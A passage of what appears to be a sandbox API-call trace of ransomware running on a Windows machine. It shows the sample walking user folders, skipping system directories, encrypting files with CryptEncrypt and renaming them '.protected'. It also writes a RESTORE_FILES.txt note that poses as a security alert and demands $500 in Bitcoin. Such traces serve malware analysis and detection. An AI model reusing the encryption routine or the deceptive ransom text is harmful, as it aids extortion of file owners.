(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.818] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.818] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.818] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.818] CloseHandle (hObject=0x150) returned 1 [0084.818] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.818] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0084.819] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0084.819] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.819] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.819] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0084.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0084.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0084.820] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.822] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.822] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.822] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.823] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.823] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.823] CloseHandle (hObject=0x150) returned 1 [0084.823] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected") returned 104 [0084.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat.protected")) returned 1 [0084.824] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Windows") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Program Files") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Program Files (x86)") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="$Recycle.bin") returned 1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="System Volume Information") returned -1 [0084.824] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned 93 [0084.824] lstrcmpW (lpString1="OWLVMZRC", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="OWLVMZRC", lpString2="..") returned 1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*") returned 95 [0084.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.825] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.825] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.825] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.825] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.825] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\.") returned 95 [0084.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.825] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.825] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.825] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\..") returned 96 [0084.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.825] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.826] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.826] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.826] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.826] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.826] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.826] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\RESTORE_FILES.txt") returned 111 [0084.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.826] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.826] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.827] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.827] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.827] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.827] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.827] CloseHandle (hObject=0x150) returned 1 [0084.828] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.828] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.828] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt") returned 102 [0084.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.840] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.840] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.840] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.840] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.841] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.841] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.841] CloseHandle (hObject=0x14c) returned 1 [0084.842] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Windows") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Program Files") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Program Files (x86)") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="$Recycle.bin") returned 1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="System Volume Information") returned -1 [0084.842] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.842] StrStrIW (lpFirst="frameiconcache.dat", lpSrch=".protected") returned 0x0 [0084.842] lstrcmpW (lpString1="frameiconcache.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.842] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.842] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".txt") returned 0x0 [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".rar") returned 0x0 [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".zip") returned 0x0 [0084.844] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x23f4, lpOverlapped=0x0) returned 1 [0084.853] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffdc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.853] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x23f4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x23f4, lpOverlapped=0x0) returned 1 [0084.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.854] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.854] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.854] CloseHandle (hObject=0x14c) returned 1 [0084.854] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.protected") returned 104 [0084.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat.protected")) returned 1 [0084.855] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Windows") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Program Files") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Program Files (x86)") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="$Recycle.bin") returned 1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="System Volume Information") returned -1 [0084.855] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.855] StrStrIW (lpFirst="MSIMGSIZ.DAT", lpSrch=".protected") returned 0x0 [0084.855] lstrcmpW (lpString1="MSIMGSIZ.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0084.855] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.856] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW 